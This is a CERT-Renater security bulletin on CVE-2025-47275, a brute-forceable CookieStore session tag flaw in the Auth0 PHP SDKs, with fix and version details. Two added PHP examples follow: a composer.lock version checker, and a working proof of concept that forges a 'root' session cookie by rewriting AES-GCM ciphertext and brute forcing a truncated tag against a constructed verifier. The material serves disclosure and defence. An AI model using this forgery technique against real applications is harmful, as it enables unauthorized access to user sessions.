=====================================================================
CERT-Renater Note d'Information No. 2025/VULN323
_____________________________________________________________________

DATE : 20/05/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running auth0/auth0-php versions prior to 8.14.0,
auth0/symfony (Composer) versions prior to 5.4.0, auth0/wordpress (Composer)
versions prior to 5.3.0, auth0/login (Composer) versions prior to 7.17.0.
=====================================================================

https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25
https://github.com/advisories/GHSA-9wg9-93h9-j8ch
https://github.com/advisories/GHSA-2f4r-34m4-3w8q
https://github.com/advisories/GHSA-9fwj-9mjf-rhj3
_____________________________________________________________________

Brute Force Authentication Tags of CookieStore Sessions in Auth0-PHP SDK

Critical
Published by femi-nonemu on May 15, 2025 (GHSA-g98g-r7gf-2r25)

Package:           auth0/auth0-php (Composer)
Affected versions: >=8.0.0-BETA1, <8.14.0
Patched versions:  8.14.0

Description

Overview
Session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access.

Am I Affected?
You are affected by this vulnerability if you meet all of the following pre-conditions:
1. Your application uses the Auth0-PHP SDK directly, or one of the following SDKs that rely on it:
   a. Auth0/symfony
   b. Auth0/laravel-auth0
   c. Auth0/wordpress
2. Session storage is configured with CookieStore.

Fix
Upgrade Auth0/Auth0-PHP to v8.14.0.
As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected.

Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
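The version thresholds listed above can be checked mechanically against a project's composer.lock. The PHP script below is an example added by the editor, not code from CERT-Renater, Okta or the Auth0 repositories: it hard-codes the four patched releases named in this bulletin, reads a lock file given on the command line (or a constructed sample embedded in the script), and flags any listed package whose locked version is below its patched release. Because composer.lock also records transitive dependencies, a patched auth0/login or auth0/symfony that still pins an old auth0/auth0-php is flagged on the core package. The sample lock content, the output format and the branch-alias handling are constructed for this example.

```php
<?php
declare(strict_types=1);

// Editor-added check (not part of the CERT-Renater bulletin or the Auth0 advisories):
// read a composer.lock and flag the Auth0 packages this bulletin lists when the
// locked version is below the first patched release.

// Patched thresholds exactly as stated in the bulletin.
const PATCHED = [
    'auth0/auth0-php' => '8.14.0',   // the CookieStore fix lives here (transitive dependency)
    'auth0/symfony'   => '5.4.0',
    'auth0/wordpress' => '5.3.0',
    'auth0/login'     => '7.17.0',   // Composer name of the laravel-auth0 SDK
];

/** Normalise a lock version ("v8.13.0", "8.0.0-BETA1", "dev-main") for version_compare(). */
function normalizeVersion(string $v): ?string
{
    $v = ltrim($v, 'vV');
    if (str_starts_with($v, 'dev-')) {
        return null;               // branch alias: no comparable release number
    }
    // version_compare() ranks pre-release suffixes (beta, rc) below the bare release.
    return strtolower($v);
}

/** @return array<string, array{installed: string, patched: string, vulnerable: ?bool}> */
function auditLock(string $lockJson): array
{
    $lock = json_decode($lockJson, true, 512, JSON_THROW_ON_ERROR);
    $findings = [];
    foreach (['packages', 'packages-dev'] as $section) {
        foreach ($lock[$section] ?? [] as $pkg) {
            $name = strtolower((string) ($pkg['name'] ?? ''));
            if (!isset(PATCHED[$name])) {
                continue;
            }
            $installed = normalizeVersion((string) $pkg['version']);
            $findings[$name] = [
                'installed'  => (string) $pkg['version'],
                'patched'    => PATCHED[$name],
                // null = cannot decide (branch alias); true = below the patched release
                'vulnerable' => $installed === null
                    ? null
                    : version_compare($installed, PATCHED[$name], '<'),
            ];
        }
    }
    return $findings;
}

// Constructed composer.lock excerpt: an old laravel-auth0 that pulled in a
// vulnerable core SDK. Both Auth0 entries must be flagged; psr/log is ignored.
$sampleLock = <<<'JSON'
{
  "packages": [
    {"name": "auth0/login", "version": "7.16.0"},
    {"name": "auth0/auth0-php", "version": "v8.13.0"},
    {"name": "psr/log", "version": "3.0.0"}
  ],
  "packages-dev": []
}
JSON;

$json = isset($argv[1]) ? file_get_contents($argv[1]) : $sampleLock;
if ($json === false) {
    fwrite(STDERR, "cannot read {$argv[1]}\n");
    exit(1);
}

foreach (auditLock($json) as $name => $f) {
    $state = $f['vulnerable'] === null
        ? 'UNDETERMINED (branch alias, check manually)'
        : ($f['vulnerable'] ? 'VULNERABLE' : 'patched');
    printf("%-18s %-14s fixed in %-8s %s\n", $name, $f['installed'], $f['patched'], $state);
}
```

Run it as `php audit.php /path/to/composer.lock` (file name constructed); with no argument it audits the embedded sample and reports both Auth0 entries as VULNERABLE. Composer 2.4 and later can also report these advisories directly with `composer audit`; the script is for hosts where only the lock file is at hand.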
Severity: Critical 9.1/10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   Low
  Privileges required: None
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     High
  Integrity:           High
  Availability:        None
  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE ID:     CVE-2025-47275
Weaknesses: No CWEs
Credits:    @Sideni (Sideni), Finder
_____________________________________________________________________

Auth0 Symfony SDK Vulnerable to Brute Force Authentication Tags of CookieStore Sessions

Critical severity, GitHub Reviewed
Published May 15, 2025 in auth0/symfony, updated May 17, 2025

Vulnerability details
Package:           auth0/symfony (Composer)
Affected versions: <5.4.0
Patched versions:  5.4.0

Description

Overview
Session cookies of applications using the Auth0 Symfony SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access.

Am I Affected?
You are affected by this vulnerability if you meet all of the following pre-conditions:
1. Your application uses the Auth0 Symfony SDK with version <=5.3.1.
2. The Auth0/Symfony SDK uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0.
3. Session storage is configured with CookieStore.

Fix
Upgrade Auth0/symfony to v5.4.0.
As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected.

Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
References
  GHSA-9wg9-93h9-j8ch
  https://nvd.nist.gov/vuln/detail/CVE-2025-47275
  auth0/symfony@9a7294f
  https://github.com/auth0/symfony/releases/tag/5.4.0

Severity: Critical 9.1/10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   Low
  Privileges required: None
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     High
  Integrity:           High
  Availability:        None
  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Weaknesses:  CWE-287
CVE ID:      No known CVE for this advisory (it references CVE-2025-47275, assigned to the underlying auth0/auth0-php issue)
GHSA ID:     GHSA-9wg9-93h9-j8ch
Source code: auth0/symfony
Credits:     @Sideni (Sideni), Finder
_____________________________________________________________________

Auth0 WordPress plugin Vulnerable to Brute Force Authentication Tags of CookieStore Sessions

Critical severity, GitHub Reviewed
Published May 15, 2025 in auth0/wordpress, updated May 17, 2025

Vulnerability details
Package:           auth0/wordpress (Composer)
Affected versions: <5.3.0
Patched versions:  5.3.0

Description

Overview
Session cookies of applications using the Auth0 WordPress plugin configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access.

Am I Affected?
You are affected by this vulnerability if you meet all of the following pre-conditions:
1. Your site uses the Auth0 WordPress plugin with version <=5.2.1.
2. The Auth0 WordPress plugin uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0.
3. Session storage is configured with CookieStore.

Fix
Upgrade the Auth0/wordpress plugin to v5.3.0.
As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected.

Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
References
  GHSA-2f4r-34m4-3w8q
  https://nvd.nist.gov/vuln/detail/CVE-2025-47275
  auth0/wordpress@06b6446
  https://github.com/auth0/wordpress/releases/tag/5.3.0

Severity: Critical 9.1/10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   Low
  Privileges required: None
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     High
  Integrity:           High
  Availability:        None
  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Weaknesses:  CWE-287
CVE ID:      No known CVE for this advisory (it references CVE-2025-47275, assigned to the underlying auth0/auth0-php issue)
GHSA ID:     GHSA-2f4r-34m4-3w8q
Source code: auth0/wordpress
Credits:     @Sideni (Sideni), Finder
_____________________________________________________________________

laravel-auth0 SDK Vulnerable to Brute Force Authentication Tags of CookieStore Sessions

Critical severity, GitHub Reviewed
Published May 15, 2025 in auth0/laravel-auth0, updated May 17, 2025

Vulnerability details
Package:           auth0/login (Composer)
Affected versions: <7.17.0
Patched versions:  7.17.0

Description

Overview
Session cookies of applications using the laravel-auth0 SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access.

Am I Affected?
You are affected by this vulnerability if you meet all of the following pre-conditions:
1. Your application uses the laravel-auth0 SDK with version <=7.16.0.
2. The laravel-auth0 SDK uses the Auth0-PHP SDK with version 8.0.0-BETA1 or higher and below 8.14.0.
3. Session storage is configured with CookieStore.

Fix
Upgrade Auth0/laravel-auth0 to v7.17.0.
As an additional precautionary measure, we recommend rotating your cookie encryption keys. Note that once updated, any previous session cookies will be rejected.

Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
References
  GHSA-9fwj-9mjf-rhj3
  https://nvd.nist.gov/vuln/detail/CVE-2025-47275
  auth0/laravel-auth0@be2c59a
  https://github.com/auth0/laravel-auth0/releases/tag/7.17.0

Severity: Critical 9.1/10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   Low
  Privileges required: None
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     High
  Integrity:           High
  Availability:        None
  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Weaknesses:  CWE-287
CVE ID:      No known CVE for this advisory (it references CVE-2025-47275, assigned to the underlying auth0/auth0-php issue)
GHSA ID:     GHSA-9fwj-9mjf-rhj3
Source code: auth0/laravel-auth0
Credits:     @Sideni (Sideni), Finder

=========================================================
+ CERT-RENATER         | tel : 01-53-94-20-44           +
+ 23/25 Rue Daviel     | fax : 01-53-94-20-41           +
+ 75013 Paris          | email: cert@support.renater.fr +
=========================================================
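The four advisories above say only that the CookieStore authentication tags "can be brute forced"; the bulletin does not state the root cause inside the SDK. The PHP example below was added by the editor and is not the Auth0-PHP CookieStore code nor anything from the advisories. It shows, in miniature, one common way an AES-GCM tag becomes brute-forceable in PHP: the verifier hands whatever tag the client supplied to openssl_decrypt(), and OpenSSL accepts GCM tags of 1 to 16 bytes on decryption, so an attacker who rewrites the ciphertext and truncates the tag to one byte needs at most 256 guesses. A hardened verifier that insists on the full 16-byte tag before calling OpenSSL rejects every truncated attempt. The key, the dot-separated base64 cookie layout (iv.tag.ciphertext), the session JSON and the attacker's target value are all constructed for this demonstration.

```php
<?php
declare(strict_types=1);

// Editor-added illustration of the weakness class named in the bulletin. NOT the
// Auth0-PHP CookieStore implementation: key, cookie layout, session payload and
// attacker target are constructed here. The SDK's actual root cause is not stated
// in the bulletin; what follows is one common shape of a brute-forceable GCM tag.

const DEMO_KEY = '0123456789abcdef';   // constructed 128-bit key, demo only
const CIPHER   = 'aes-128-gcm';
const TAG_LEN  = 16;

/** Server side: seal a session as base64(iv).base64(tag).base64(ciphertext). Constructed format. */
function sealCookie(string $key, string $session): string
{
    $iv  = random_bytes(12);
    $tag = '';
    $ct  = openssl_encrypt($session, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag, '', TAG_LEN);
    if ($ct === false) {
        throw new RuntimeException('openssl_encrypt failed');
    }
    return implode('.', array_map('base64_encode', [$iv, $tag, $ct]));
}

/** Weak verifier: trusts whatever tag length the client sent. OpenSSL checks only that many bytes. */
function weakOpen(string $key, string $cookie): ?string
{
    $parts = explode('.', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$iv, $tag, $ct] = array_map('base64_decode', $parts);
    $pt = openssl_decrypt($ct, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag);
    return $pt === false ? null : $pt;
}

/** Hardened verifier: refuses anything but a full 128-bit tag before OpenSSL sees it. */
function strictOpen(string $key, string $cookie): ?string
{
    $parts = explode('.', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$iv, $tag, $ct] = array_map(static fn(string $p) => base64_decode($p, true), $parts);
    if ($iv === false || $tag === false || $ct === false
        || strlen($iv) !== 12 || strlen($tag) !== TAG_LEN) {
        return null;   // truncated or malformed tag: reject without decrypting
    }
    $pt = openssl_decrypt($ct, CIPHER, $key, OPENSSL_RAW_DATA, $iv, $tag);
    return $pt === false ? null : $pt;
}

/**
 * Attacker side, no key needed. GCM is counter-mode encryption, so XORing the
 * ciphertext with (knownPlaintext XOR wantedPlaintext) rewrites the session; only
 * the tag stands in the way, and it is brute forced one byte long against the
 * server's verifier ($open). Returns [guesses, acceptedPlaintext] or null.
 */
function forgeWithTruncatedTag(string $cookie, string $known, string $wanted, callable $open): ?array
{
    [$ivB64, , $ctB64] = explode('.', $cookie, 3);
    $forgedCt = base64_decode($ctB64) ^ ($known ^ $wanted);
    for ($guess = 0; $guess < 256; $guess++) {
        $forged = $ivB64 . '.' . base64_encode(chr($guess)) . '.' . base64_encode($forgedCt);
        $pt = $open($forged);
        if ($pt !== null) {
            return [$guess + 1, $pt];
        }
    }
    return null;
}

$known  = '{"uid":42,"role":"user"}';
$wanted = '{"uid":42,"role":"root"}';   // same length, so the XOR mask lines up byte for byte
$cookie = sealCookie(DEMO_KEY, $known);

$weak = forgeWithTruncatedTag($cookie, $known, $wanted, static fn(string $c) => weakOpen(DEMO_KEY, $c));
echo $weak
    ? "weak verifier:   forged {$weak[1]} accepted after {$weak[0]} guesses\n"
    : "weak verifier:   rejected (unexpected)\n";

$strict = forgeWithTruncatedTag($cookie, $known, $wanted, static fn(string $c) => strictOpen(DEMO_KEY, $c));
echo $strict === null
    ? "strict verifier: all 256 truncated tags rejected\n"
    : "strict verifier: ACCEPTED a forgery (should not happen)\n";
```

Run with `php` on any 8.x build with the openssl extension. The weak verifier accepts the `"role":"root"` forgery within 256 attempts because only the first tag byte is compared; the strict verifier never reaches openssl_decrypt() for a short tag. The same logic explains the bulletin's key-rotation advice: once the cookie encryption key changes, every cookie sealed under the old key fails tag verification and is rejected, which is the intended outcome for any session an attacker may already have forged.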